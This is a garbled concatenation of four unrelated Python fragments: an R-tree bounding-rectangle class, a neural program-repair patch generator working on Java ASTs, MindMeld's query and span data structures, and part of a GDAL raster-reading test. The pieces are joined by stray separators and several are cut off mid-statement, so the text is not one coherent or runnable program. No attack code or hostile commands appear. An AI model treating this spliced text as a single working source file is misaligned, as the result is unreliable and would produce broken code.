# y goes from top (negative) to bottom (positive)
class MBR:
def __init__(self, upper_left, lower_right):
self.upper_left = upper_left
self.lower_right = lower_right
def isRaw(self):
return False
def isComposite(self):
return False
def getUpperLeft(self):
return self.upper_left
def getLowerRight(self):
return self.lower_right
def getArea(self):
upper_left = self.getUpperLeft()
lower_right = self.getLowerRight()
x1, y1 = upper_left
x2, y2 = lower_right
side1_length = x2 - x1
side2_length = y2 - y1
area = side1_length * side2_length
return area
# require that base_mbr is composite and mbr is raw or composite
# return a composite MBR object
@staticmethod
def getEnlargedMBR(base_mbr, mbr):
mbr_list = [base_mbr, mbr]
upper_left_points = [x.getUpperLeft() for x in mbr_list]
lower_right_points = [x.getLowerRight() for x in mbr_list]
points = upper_left_points + lower_right_points
x_values = [x[0] for x in points]
y_values = [x[1] for x in points]
min_x_value = min(x_values)
max_x_value = max(x_values)
min_y_value = min(y_values)
max_y_value = max(y_values)
upper_left_point = (min_x_value, min_y_value)
lower_right_point = (max_x_value, max_y_value)
result_mbr_list = base_mbr.getMBRList() + [mbr]
mbr = CompositeMBR(upper_left_point, lower_right_point, result_mbr_list)
return mbr
@staticmethod
def getAreaEnlargement(base_mbr, mbr):
base_mbr_area = base_mbr.getArea()
enlarged_mbr = MBR.getEnlargedMBR(base_mbr, mbr)
enlarged_mbr_area = enlarged_mbr.getArea()
area_change = enlarged_mbr_area - base_mbr_area
return area_change
@staticmethod
def doOverlap(mbr_a, mbr_b):
upper_left_a = mbr_a.getUpperLeft()
lower_right_a = mbr_a.getLowerRight()
upper_left_b = mbr_b.getUpperLeft()
lower_right_b = mbr_b.getLowerRight()
x1_a, y1_a = upper_left_a
x2_a, y2_a = lower_right_a
x1_b, y1_b = upper_left_b
x2_b, y2_b = lower_right_b
do_overlap = x1_a <= x2_b and x2_a >= x1_b and y1_a <= y2_b and y2_a >= y1_b
return do_overlap
def toString(self):
upper_left = self.getUpperLeft()
lower_right = self.getLowerRight()
x1, y1 = upper_left
x2, y2 = lower_right
return "[" + str(x1) + ", " + str(y1) + ", " + str(x2) + ", " + | |
x.father = node.father
if change:
node = Node('root', -1)
node.child.append(copynode)
copynode.father = node
ans.solveroot = node#copynode
ans.type = type
#print(node.printTree(ans.solveroot))
else:
ans.solveroot = ans.root
ans.type = type
#print(copynode.printTree(copynode))
#assert(0)
return
import re
def replaceVar(root, rrdict):
if root.name in rrdict:
root.name = rrdict[root.name]
elif len(root.child) == 0:
if re.match('loc%d', root.name) is not None or re.match('par%d', root.name) is not None:
return False
ans = True
for x in root.child:
ans = ans and replaceVar(x, rrdict)
return ans
def getUnknown(root):
if root.name == 'unknown':
return [root]
ans = []
for x in root.child:
ans.extend(getUnknown(x))
return ans
def solveUnknown(ans, vardic, typedic, classcontent, sclassname, mode):
nodes = getUnknown(ans.solveroot)
fans = []
if len(nodes) >= 2:
return []
elif len(nodes) == 0:
#print(ans.root.printTree(ans.solveroot))
return [ans.root.printTree(ans.solveroot)]
else:
#print(2)
unknown = nodes[0]
if unknown.father.father and unknown.father.father.name == 'MethodInvocation':
classname = ''
args = []
print('method')
if unknown.father.name == 'member':
for x in unknown.father.father.child:
if x.name == 'qualifier':
print(x.child[0].name, typedic)
if x.child[0].name in typedic:
classname = typedic[x.child[0].name]
break
else:
if sclassname == 'org.jsoup.nodes.Element':
sclassname = 'org.jsoup.nodes.Node'
for f in classcontent[sclassname + '.java']['classes'][0]['fields']:
print(x.child[0].name, f['name'])
if f['name'] == x.child[0].name[:-4]:
classname = f['type']
break
for x in unknown.father.father.child:
if x.name == 'arguments':
for y in x.child:
if y.name == 'MemberReference':
try:
if y.child[0].child[0].name in typedic:
args.append(typedic[y.child[0].child[0].name])
else:
#print(6, y.child[0].child[0].name)
args.append('int')#return []
except:
#print('gg2')
return []
elif y.name == 'Literal':
if y.child[0].child[0].name == "<string>_er":
args.append("String")
else:
args.append("int")
else:
print('except')
return []
print(7, classname)
if classname == '':
classbody = classcontent[sclassname + '.java']['classes']
elif classname != '':
if classname + ".java" not in classcontent:
#print(5, classname )
return []
classbody = classcontent[classname + '.java']['classes']
#print(5, sclassname, classbody, classname)
#print(8)
if unknown.father.name == 'qualifier':
vtype = ""
for x in classbody[0]['fields']:
#print(x)
if x['name'] == ans.type[:-4]:
vtype = x['type']
break
if 'IfStatement' in ans.getTreestr():
if mode == 1 and len(ans.solveroot.child) == 1:
#print(ans.solveroot.printTree(ans.solveroot))
return []
#print(ans.solveroot.printTree(ans.solveroot))
if unknown.father.name == 'member':
for x in classbody[0]['methods']:
if len(x['params']) == 0 and x['type'] == 'boolean':
unknown.name = x['name'] + "_ter"
#print('gggg', unknown.printTree(ans.solveroot))
fans.append(unknown.printTree(ans.solveroot))
elif unknown.father.name == 'qualifier':
for x in classbody[0]['fields']:
if x['type'] == vtype:
unknown.name = x['name'] + "_ter"
fans.append(unknown.printTree(ans.solveroot))
else:
#print("a", args)
if mode == 0 and ans.root == ans.solveroot and len(args) == 0 and classname != 'EndTag':
return []
otype = ""
if classname == 'EndTag':
otype = "String"
if mode == 0 and ans.type != '':
args = []
if ans.type == "valid":
return []
for m in classbody[0]['methods']:
#print(m['name'])
if m['name'] == ans.type[:-4]:
otype = m['type']
for y in m['params']:
args.append(y['type'])
break
#print(args, ans.type, 'o')
if unknown.father.name == 'member':
#print(mode, ans.type, args)
for x in classbody[0]['methods']:
#print(x)
print(x['type'], otype, x['name'], ans.type)
if len(args) == 0 and len(x['params']) == 0:
if mode == 0 and x['type'] != otype:
continue
if mode == 1 and x['type'] is not None:
continue
#if mode == 1 and x['type'] != "null":
# continue
unknown.name = x['name'] + "_ter"
#print('gggg', unknown.printTree(ans.solveroot))
fans.append(unknown.printTree(ans.solveroot))
#print(x['name'], x['type'], args)
if ans.type != '':
if mode == 0 and len(args) > 0 and x['type'] == otype:
targ = []
for y in x['params']:
targ.append(y['type'])
if args == targ:
unknown.name = x['name'] + "_ter"
fans.append(unknown.printTree(ans.solveroot))
else:
#print(10)
if mode == 0 and len(args) > 0:
#print(11)
targ = []
for y in x['params']:
targ.append(y['type'])
#print('p', targ, x['name'], x)
if args == targ and 'type' in x and x['type'] is None:
unknown.name = x['name'] + "_ter"
fans.append(unknown.printTree(ans.solveroot))
elif unknown.father.name == 'qualifier':
if ans.type == 'valid':
return []
for x in classbody[0]['fields']:
if x['type'] == vtype:
unknown.name = x['name'] + "_ter"
fans.append(unknown.printTree(ans.solveroot))
for x in classbody[0]['methods']:
if x['type'] == vtype and len(x['params']) == 0:
tmpnode = Node('MethodInvocation', -1)
tmpnode1 = Node('member', -1)
tmpnode2 = Node(x['name'] + "_ter", -1)
tmpnode.child.append(tmpnode1)
tmpnode1.father = tmpnode
tmpnode1.child.append(tmpnode2)
tmpnode2.father = tmpnode1
unknown.name = " ".join(tmpnode.printTree(tmpnode).split()[:-1])#tmpnode.printTree(tmpnode)
fans.append(unknown.printTree(ans.solveroot))
elif unknown.father.name == 'qualifier':
classbody = classcontent[sclassname + '.java']['classes']
vtype = ""
for x in classbody[0]['fields']:
if x['name'] == ans.type[:-4]:
vtype = x['type']
break
#print(5, vtype)
for x in classbody[0]['fields']:
if x['type'] == vtype:
unknown.name = x['name'] + "_ter"
fans.append(unknown.printTree(ans.solveroot))
for x in classbody[0]['methods']:
if x['type'] == vtype and len(x['params']) == 0:
tmpnode = Node('MethodInvocation', -1)
tmpnode1 = Node('member', -1)
tmpnode2 = Node(x['name'] + "_ter", -1)
tmpnode.child.append(tmpnode1)
tmpnode1.father = tmpnode
tmpnode1.child.append(tmpnode2)
tmpnode2.father = tmpnode1
unknown.name = " ".join(tmpnode.printTree(tmpnode).split()[:-1])
fans.append(unknown.printTree(ans.solveroot))
elif unknown.father.name == 'member':
classname = ''
if unknown.father.name == 'member':
for x in unknown.father.father.child:
if x.name == 'qualifier':
if x.child[0].name in typedic:
classname = typedic[x.child[0].name]
break
else:
for f in classcontent[sclassname + '.java']['classes'][0]['fields']:
if f['name'] == x.child[0].name[:-4]:
classname = f['type']
break
if x.child[0].name[:-4] + ".java" in classcontent:
classname = x.child[0].name[:-4]
#print(0, classname, ans.type)
if classname == '':
classbody = classcontent[sclassname + '.java']['classes']
elif classname != '':
if classname + ".java" not in classcontent:
#print(5, classname )
return []
classbody = classcontent[classname + '.java']['classes']
vtype = ""
#print('type', ans.type)
for x in classbody[0]['fields']:
if x['name'] == ans.type[:-4]:
vtype = x['type']
break
if unknown.father.father.father.father and (unknown.father.father.father.father.name == 'MethodInvocation' or unknown.father.father.father.father.name == 'ClassCreator') and ans.type == "":
mname = ""
tname = ""
if unknown.father.father.father.father.name == "MethodInvocation":
tname = 'member'
else:
tname = 'type'
for s in unknown.father.father.father.father.child:
if s.name == 'member' and tname == 'member':
mname = s.child[0].name
if s.name == 'type' and tname == 'type':
mname = s.child[0].child[0].child[0].name
idx = unknown.father.father.father.child.index(unknown.father.father)
#print(idx)
if tname == 'member':
for f in classbody[0]['methods']:
if f['name'] == mname[:-4] and idx < len(f['params']):
vtype = f['params'][idx]['type']
print(vtype, f['name'])
break
else:
if mname[:-4] + ".java" not in classcontent:
return []
for f in classcontent[mname[:-4] + ".java"]['classes'][0]['methods']:
#print(f['name'], f['params'], mname[:-4])
if f['name'] == mname[:-4] and idx < len(f['params']):
vtype = f['params'][idx]['type']
break
if True:
for x in classbody[0]['fields']:
#print(classname, x['type'], x['name'], vtype, ans.type)
if x['type'] == vtype or (x['type'] == 'double' and vtype == 'int'):# or vtype == "":
unknown.name = x['name'] + "_ter"
fans.append(unknown.printTree(ans.solveroot))
return fans
def extarctmode(root):
mode = 0
if len(root.child) == 0:
return 0, None
if root.child[0].name == 'modified':
mode = 0
elif root.child[0].name == 'add':
mode = 1
else:
return 0, None
print(root.printTree(root))
#assert(0)
root.child.pop(0)
return mode, root
def solveone(data, model):#(treestr, prob, model, subroot, vardic, typedic, idx, idss, classname, mode):
#os.environ["CUDA_VISIBLE_DEVICES"]="2, 3"
#assert(len(data) <= 40)
args.batch_size = 20
dev_set = SumDataset(args, "test")
dev_set.preProcessOne(data)#x = dev_set.preProcessOne(treestr, prob)
#dev_set.nl = [treestr.split()]
indexs = 0
devloader = torch.utils.data.DataLoader(dataset=dev_set, batch_size=args.batch_size,
shuffle=False, drop_last=False, num_workers=0)
savedata = []
patch = {}
for x in tqdm(devloader):
if indexs < 0:
indexs += 1
continue
#print(indexs,indexs * args.batch_size, data[5]['oldcode'])
#print(x[0][0], dev_set.data[0][idx])
#assert(np.array_equal(x[0][0], dev_set.datam[0][4]))
#assert(np.array_equal(x[1][0], dev_set.datam[1][4].toarray()))
#assert(np.array_equal(x[2][0], dev_set.datam[8][4]))
#assert(np.array_equal(x[3][0], dev_set.datam[9][4]))
#print(data[indexs]['mode'], data[indexs]['oldcode'])
ans = BeamSearch((x[0], x[1], None, None, None, None, None, None, x[2], x[3]), dev_set, model, 50, args.batch_size, indexs)
for i in range(len(ans)):
currid = indexs * args.batch_size + i
idss = data[currid]['idss']
subroot = data[currid]['subroot']
if os.path.exists("../result/%s.json" % idss):
classcontent = json.load(open("../result/%s.json" % idss, 'r') )
else:
classcontent = []
classcontent.extend(json.load(open("temp.json", 'r')))
rrdicts = {}
for x in classcontent:
rrdicts[x['filename']] = x
if 'package_name' in x:
rrdicts[x['package_name'] + "." + x['filename']] = x
vardic = data[currid]['vardic']
typedic = data[currid]['typedic']
classname = data[currid]['classname']#data[currid]['classname'].split(".")[-1]
#print(classname)
#assert(0)
mode = data[currid]['mode']
rrdict = {}
for x in vardic:
rrdict[vardic[x]] = x
for j in range(len(ans[i])):
if j > 30 and idss != 'Lang-33':
break
mode, ans[i][j].root = extarctmode(ans[i][j].root)
if ans[i][j].root is None:
continue
print(j, ans[i][j].root.printTree(ans[i][j].root))
applyoperater(ans[i][j], subroot)
#print(j, ans[i][j].root.printTree(ans[i][j].solveroot))
an = replaceVar(ans[i][j].solveroot, rrdict)
#print(j, ans[i][j].root.printTree(ans[i][j].solveroot))
if not an:
continue
#print(7, ans[i][j].type)
try:
tcodes = solveUnknown(ans[i][j], vardic, typedic, rrdicts, classname, mode)
except Exception as e:
traceback.print_exc()
tcodes = []
print(tcodes)
for code in tcodes:
if code.split(" ")[0] != 'root':
assert(0)
if str(mode) + code + str(data[currid]['line']) not in patch:
patch[str(mode) + code + str(data[currid]['line'])] = 1
else:
continue
savedata.append({'id':currid, 'idss':idss, 'precode':data[currid]['precode'], 'aftercode':data[currid]['aftercode'], 'oldcode':data[currid]['oldcode'], 'filename':data[currid]['filepath'], 'mode':mode, 'code':code, 'line':data[currid]['line'], 'isa':data[currid]['isa']})
indexs += 1
#for x in savedata:
# print(x['oldcode'], x['code'])
#exit(0)
#f.write(" ".join(ans.ans[1:-1]))
#f.write("\n")
#f.flush()#print(ans)
#print(x[0][0], dev_set.data[0][idx])
#assert(np.array_equal(x[0][0], dev_set.data[0][idx]))
#assert(np.array_equal(x[1][0], dev_set.data[1][idx].toarray()))
#assert(np.array_equal(x[2][0], dev_set.data[8][idx]))
#assert(np.array_equal(x[3][0], dev_set.data[9][idx]))
open('patchmu/%s.json' % data[0]['idss'], 'w').write(json.dumps(savedata, indent=4))
def solveone2(data, model):#(treestr, prob, model, | |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015 Cisco Systems, Inc. and others. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains a collection of the core data structures used in MindMeld."""
import logging
TEXT_FORM_RAW = 0
TEXT_FORM_PROCESSED = 1
TEXT_FORM_NORMALIZED = 2
TEXT_FORMS = [TEXT_FORM_RAW, TEXT_FORM_PROCESSED, TEXT_FORM_NORMALIZED]
logger = logging.getLogger(__name__)
# The date keys are extracted from here
# https://github.com/wit-ai/duckling_old/blob/a4bc34e3e945d403a9417df50c1fb2172d56de3e/src/duckling/time/obj.clj#L21 # noqa E722
TIME_GRAIN_TO_ORDER = {
"year": 8,
"quarter": 7,
"month": 6,
"week": 5,
"day": 4,
"hour": 3,
"minute": 2,
"second": 1,
"milliseconds": 0,
}
def _sort_by_lowest_time_grain(system_entities):
return sorted(
system_entities,
key=lambda query_entity: TIME_GRAIN_TO_ORDER[
query_entity.entity.value["grain"]
],
)
class Bunch(dict):
"""Dictionary-like object that exposes its keys as attributes.
Inspired by scikit learn's Bunches
>>> b = Bunch(a=1, b=2)
>>> b['b']
2
>>> b.b
2
>>> b.a = 3
>>> b['a']
3
>>> b.c = 6
>>> b['c']
6
"""
def __init__(self, **kwargs):
super().__init__(kwargs)
def __setattr__(self, key, value):
self[key] = value
def __dir__(self):
return self.keys()
def __getattr__(self, key):
try:
return self[key]
except KeyError:
raise AttributeError(key)
def __setstate__(self, state):
pass
class Span:
"""Object representing a text span with start and end indices
Attributes:
start (int): The index from the original text that represents the start of the span
end (int): The index from the original text that represents the end of the span
"""
__slots__ = ["start", "end"]
def __init__(self, start, end):
assert start <= end, "Span 'start' must be less than or equal to 'end'"
self.start = start
self.end = end
def to_dict(self):
"""Converts the span into a dictionary"""
return {"start": self.start, "end": self.end}
def slice(self, obj):
"""Returns the slice of the object for this span
Args:
obj: The object to slice
Returns:
The slice of the passed in object for this span
"""
return obj[self.start : self.end + 1]
def shift(self, offset):
"""Shifts a span by offset
Args:
offset (int): The number to change start and end by
"""
return Span(self.start + offset, self.end + offset)
def __iter__(self):
for index in range(self.start, self.end + 1):
yield index
def __len__(self):
return self.end - self.start + 1
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.start == other.start and self.end == other.end
return NotImplemented
def __ne__(self, other):
if isinstance(other, self.__class__):
return not self.__eq__(other)
return NotImplemented
def __repr__(self):
return "{}(start={}, end={})".format(
self.__class__.__name__, self.start, self.end
)
class Query:
"""The query object is responsible for processing and normalizing raw user text input so that
classifiers can deal with it. A query stores three forms of text: raw text, processed text, and
normalized text. The query object is also responsible for translating text ranges across these
forms.
Attributes:
raw_text (str): the original input text
processed_text (str): the text after it has been preprocessed. The pre-processing happens
at the application level and is generally used for special characters
normalized_tokens (tuple of str): a list of normalized tokens
system_entity_candidates (tuple): A list of system entities extracted from the text
locale (str, optional): The locale representing the ISO 639-1 language code and \
ISO3166 alpha 2 country code separated by an underscore character.
language (str, optional): The language code representing ISO 639-1 language codes.
time_zone (str): The IANA id for the time zone in which the query originated
such as 'America/Los_Angeles'
timestamp (long, optional): A unix timestamp used as the reference time
If not specified, the current system time is used. If `time_zone`
is not also specified, this parameter is ignored
stemmed_tokens (list): A sequence of stemmed tokens for the query text
"""
# TODO: look into using __slots__
def __init__(
self,
raw_text,
processed_text,
normalized_tokens,
char_maps,
locale=None,
language=None,
time_zone=None,
timestamp=None,
stemmed_tokens=None,
):
"""Creates a query object
Args:
raw_text (str): the original input text
processed_text (str): the input text after it has been preprocessed
normalized_tokens (list of dict): List tokens outputted by
a tokenizer
char_maps (dict): Mappings between character indices in raw,
processed and normalized text
"""
self._normalized_tokens = normalized_tokens
norm_text = " ".join([t["entity"] for t in self._normalized_tokens])
self._texts = (raw_text, processed_text, norm_text)
self._char_maps = char_maps
self.system_entity_candidates = ()
self._locale = locale
self._language = language
self._time_zone = time_zone
self._timestamp = timestamp
self.stemmed_tokens = stemmed_tokens or tuple()
@property
def text(self):
"""The original input text"""
return self._texts[TEXT_FORM_RAW]
@property
def processed_text(self):
"""The input text after it has been preprocessed"""
return self._texts[TEXT_FORM_PROCESSED]
@property
def normalized_text(self):
"""The normalized input text"""
return self._texts[TEXT_FORM_NORMALIZED]
@property
def stemmed_text(self):
"""The stemmed input text"""
return " ".join(self.stemmed_tokens)
@property
def normalized_tokens(self):
"""The tokens of the normalized input text"""
return tuple((token["entity"] for token in self._normalized_tokens))
@property
def language(self):
"""Language of the query specified using a 639-2 code."""
return self._language
@property
def locale(self):
"""The locale representing the ISO 639-1/2 language code and
ISO3166 alpha 2 country code separated by an underscore character."""
return self._locale
@property
def time_zone(self):
"""The IANA id for the time zone in which the query originated
such as 'America/Los_Angeles'.
"""
return self._time_zone
@property
def timestamp(self):
"""A unix timestamp for when the time query was created. If `time_zone` is None,
this parameter is ignored.
"""
return self._timestamp
def get_text_form(self, form):
"""Programmatically retrieves text by form
Args:
form (int): A valid text form (TEXT_FORM_RAW, TEXT_FORM_PROCESSED, or
TEXT_FORM_NORMALIZED)
Returns:
str: The requested text
"""
return self._texts[form]
def get_system_entity_candidates(self, sys_types):
"""
Args:
sys_types (set of str): A set of entity types to select
Returns:
list: Returns candidate system entities of the types specified
"""
return [e for e in self.system_entity_candidates if e.entity.type in sys_types]
def transform_span(self, text_span, form_in, form_out):
"""Transforms a text range from one form to another.
Args:
text_span (Span): the text span being transformed
form_in (int): the input text form. Should be one of TEXT_FORM_RAW, TEXT_FORM_PROCESSED
or TEXT_FORM_NORMALIZED
form_out (int): the output text form. Should be one of TEXT_FORM_RAW,
TEXT_FORM_PROCESSED or TEXT_FORM_NORMALIZED
Returns:
tuple: the equivalent range of text in the output form
"""
return Span(
self.transform_index(text_span.start, form_in, form_out),
self.transform_index(text_span.end, form_in, form_out),
)
def transform_index(self, index, form_in, form_out):
"""Transforms a text index from one form to another.
Args:
index (int): the index being transformed
form_in (int): the input form. should be one of TEXT_FORM_RAW
form_out (int): the output form
Returns:
int: the equivalent index of text in the output form
"""
if form_in not in TEXT_FORMS or form_out not in TEXT_FORMS:
raise ValueError("Invalid text form")
if form_in > form_out:
while form_in > form_out:
index = self._unprocess_index(index, form_in)
form_in -= 1
else:
while form_in < form_out:
index = self._process_index(index, form_in)
form_in += 1
return index
def _process_index(self, index, form_in):
if form_in == TEXT_FORM_NORMALIZED:
raise ValueError(
"'{}' form cannot be processed".format(TEXT_FORM_NORMALIZED)
)
mapping_key = (form_in, (form_in + 1))
try:
mapping = self._char_maps[mapping_key]
except KeyError:
# mapping doesn't exist -> use identity
return index
# None for mapping means 1-1 mapping
try:
return mapping[index] if mapping else index
except KeyError:
raise ValueError("Invalid index {}".format(index))
def _unprocess_index(self, index, form_in):
if form_in == TEXT_FORM_RAW:
raise ValueError("'{}' form cannot be unprocessed".format(TEXT_FORM_RAW))
mapping_key = (form_in, (form_in - 1))
try:
mapping = self._char_maps[mapping_key]
except KeyError:
# mapping doesn't exist -> use identity
return index
# None for mapping means 1-1 mapping
try:
return mapping[index] if mapping else index
except KeyError:
raise ValueError("Invalid index {}".format(index))
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.__dict__ == other.__dict__
return NotImplemented
def __ne__(self, other):
if isinstance(other, self.__class__):
return not self.__eq__(other)
return NotImplemented
def __repr__(self):
return "<{} {!r}>".format(self.__class__.__name__, self.text)
class ProcessedQuery:
"""A processed query contains a query and the additional metadata that has been labeled or
predicted.
Attributes:
query (Query): The underlying query object.
domain (str): The domain of the query
entities (list): A list of entities present in this query
intent (str): The intent of the query
is_gold | |
= ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=4 * xsize, buf_ysize=4 * ysize)
ref_nbands_data_native_type_downsampled_x_upsampled_y = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=32 * ysize)
ref_nbands_data_native_type_unordered_list = ds.ReadRaster(xoff, yoff, xsize, ysize, band_list=[nbands - i for i in range(nbands)])
ref_nbands_data_native_type_pixel_interleaved = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=nbands * dt_size, buf_band_space=dt_size)
ref_nbands_data_native_type_pixel_interleaved_whole = ds.ReadRaster(buf_pixel_space=nbands * dt_size, buf_band_space=dt_size)
ref_nbands_m_1_data_native_type_pixel_interleaved_with_extra_space = ds.ReadRaster(xoff, yoff, xsize, ysize, band_list=[i + 1 for i in range(nbands - 1)], buf_pixel_space=nbands * dt_size, buf_band_space=dt_size)
ref_nbands_data_float32 = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_type=gdal.GDT_Float32)
ref_nbands_data_float32_pixel_interleaved = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_type=gdal.GDT_Float32, buf_pixel_space=nbands * sizeof_float, buf_band_space=1 * sizeof_float)
ref_nbands_data_native_type_custom_spacings = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=2 * nbands * dt_size, buf_band_space=dt_size)
if nbands == 3:
ref_nbands_data_native_type_custom_spacings_2 = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=4 * dt_size, buf_band_space=dt_size)
if truncated:
gdal.PopErrorHandler()
ds = None
if truncated:
gdal.PushErrorHandler()
old_val = gdal.GetConfigOption(option)
gdal.SetConfigOption(option, 'YES')
ds = gdal.Open(filename)
band_interleaved = ds.GetMetadataItem('INTERLEAVE', 'IMAGE_STRUCTURE') == 'BAND'
got_data_native_type = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize)
got_data_native_type_whole = ds.GetRasterBand(1).ReadRaster()
got_data_native_type_downsampled = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=int(ysize / 2))
got_data_native_type_downsampled_not_nearest = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=int(ysize / 2), resample_alg=gdal.GRIORA_Bilinear)
got_data_native_type_upsampled = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=nbands * xsize, buf_ysize=nbands * ysize)
got_data_native_type_custom_spacings = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=nbands * dt_size)
got_data_float32 = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize, buf_type=gdal.GDT_Float32)
got_nbands_data_native_type = ds.ReadRaster(xoff, yoff, xsize, ysize)
got_nbands_data_native_type_whole = ds.ReadRaster()
got_nbands_data_native_type_bottom_right_downsampled = ds.ReadRaster(ds.RasterXSize - 2, ds.RasterYSize - 1, 2, 1, buf_xsize=1, buf_ysize=1, buf_pixel_space=nbands * dt_size, buf_band_space=dt_size)
got_nbands_data_native_type_downsampled = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=int(ysize / 2))
got_nbands_data_native_type_downsampled_interleaved = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=int(ysize / 2), buf_pixel_space=nbands * dt_size, buf_band_space=dt_size)
got_nbands_data_native_type_downsampled_not_nearest = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=int(ysize / 2), resample_alg=gdal.GRIORA_Bilinear)
got_nbands_data_native_type_upsampled = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=4 * xsize, buf_ysize=4 * ysize)
got_nbands_data_native_type_downsampled_x_upsampled_y = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=32 * ysize)
got_nbands_data_native_type_unordered_list = ds.ReadRaster(xoff, yoff, xsize, ysize, band_list=[nbands - i for i in range(nbands)])
got_nbands_data_native_type_pixel_interleaved = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=nbands * dt_size, buf_band_space=dt_size)
got_nbands_data_native_type_pixel_interleaved_whole = ds.ReadRaster(buf_pixel_space=nbands * dt_size, buf_band_space=dt_size)
got_nbands_m_1_data_native_type_pixel_interleaved_with_extra_space = ds.ReadRaster(xoff, yoff, xsize, ysize, band_list=[i + 1 for i in range(nbands - 1)], buf_pixel_space=nbands * dt_size, buf_band_space=dt_size)
got_nbands_data_float32 = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_type=gdal.GDT_Float32)
got_nbands_data_float32_pixel_interleaved = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_type=gdal.GDT_Float32, buf_pixel_space=nbands * sizeof_float, buf_band_space=1 * sizeof_float)
got_nbands_data_native_type_custom_spacings = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=2 * nbands * dt_size, buf_band_space=dt_size)
if nbands == 3:
got_nbands_data_native_type_custom_spacings_2 = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=4 * dt_size, buf_band_space=dt_size)
ds = None
gdal.SetConfigOption(option, old_val)
if truncated:
gdal.PopErrorHandler()
gdal.Unlink(filename)
if ref_data_native_type != got_data_native_type:
print(option)
pytest.fail(i)
if truncated and not band_interleaved:
if got_data_native_type_whole is not None:
print(truncated)
print(band_interleaved)
print(option)
print(i)
pytest.fail(gdal.GetDataTypeName(dt))
elif ref_data_native_type_whole != got_data_native_type_whole:
print(i)
pytest.fail(option)
if ref_data_native_type_downsampled != got_data_native_type_downsampled:
print(option)
pytest.fail(i)
if not truncated and ref_data_native_type_downsampled_not_nearest != got_data_native_type_downsampled_not_nearest:
print(band_interleaved)
print(option)
pytest.fail(i)
if ref_data_native_type_upsampled != got_data_native_type_upsampled:
print(option)
pytest.fail(i)
for y in range(ysize):
for x in range(xsize):
for k in range(dt_size):
if ref_data_native_type_custom_spacings[(y * xsize + x) * nbands * dt_size + k] != got_data_native_type_custom_spacings[(y * xsize + x) * nbands * dt_size + k]:
print(gdal.GetDataTypeName(dt))
print(option)
pytest.fail(i)
if not truncated:
for band in range(nbands):
if ref_nbands_data_native_type_custom_spacings[(y * xsize + x) * 2 * nbands * dt_size + band * dt_size + k] != got_nbands_data_native_type_custom_spacings[(y * xsize + x) * 2 * nbands * dt_size + band * dt_size + k]:
print(gdal.GetDataTypeName(dt))
print(option)
pytest.fail(i)
if nbands == 3:
for band in range(nbands):
if ref_nbands_data_native_type_custom_spacings_2[(y * xsize + x) * 4 * dt_size + band * dt_size + k] != got_nbands_data_native_type_custom_spacings_2[(y * xsize + x) * 4 * dt_size + band * dt_size + k]:
print(gdal.GetDataTypeName(dt))
print(option)
pytest.fail(i)
if ref_data_float32 != got_data_float32:
print(gdal.GetDataTypeName(dt))
print(option)
pytest.fail(i)
if not truncated and ref_nbands_data_native_type != got_nbands_data_native_type:
print(band_interleaved)
print(option)
pytest.fail(i)
if truncated:
if got_nbands_data_native_type_whole is not None:
print(gdal.GetDataTypeName(dt))
print(option)
pytest.fail(i)
elif ref_nbands_data_native_type_whole != got_nbands_data_native_type_whole:
print(option)
print(i)
pytest.fail(gdal.GetDataTypeName(dt))
if truncated:
if got_nbands_data_native_type_pixel_interleaved_whole is not None:
print(option)
pytest.fail(i)
elif ref_nbands_data_native_type_pixel_interleaved_whole != got_nbands_data_native_type_pixel_interleaved_whole:
print(i)
pytest.fail(option)
if truncated and got_nbands_data_native_type_bottom_right_downsampled is not None:
print(gdal.GetDataTypeName(dt))
print(option)
pytest.fail(i)
if truncated:
continue
if ref_nbands_data_native_type_downsampled != got_nbands_data_native_type_downsampled:
print(option)
pytest.fail(i)
if ref_nbands_data_native_type_downsampled_interleaved != got_nbands_data_native_type_downsampled_interleaved:
print(option)
pytest.fail(i)
if ref_nbands_data_native_type_downsampled_not_nearest != got_nbands_data_native_type_downsampled_not_nearest:
print(option)
pytest.fail(i)
if ref_nbands_data_native_type_upsampled != got_nbands_data_native_type_upsampled:
print(option)
# import struct
# f1 = open('out1.txt', 'wb')
# f2 = open('out2.txt', 'wb')
# for b in range(nbands):
# for y in range(4 * ysize):
# f1.write('%s\n' % str(struct.unpack('B' * 4 * xsize, ref_nbands_data_native_type_upsampled[(b * 4 * ysize + y) * 4 * xsize : (b * 4 * ysize + y + 1) * 4 * xsize])))
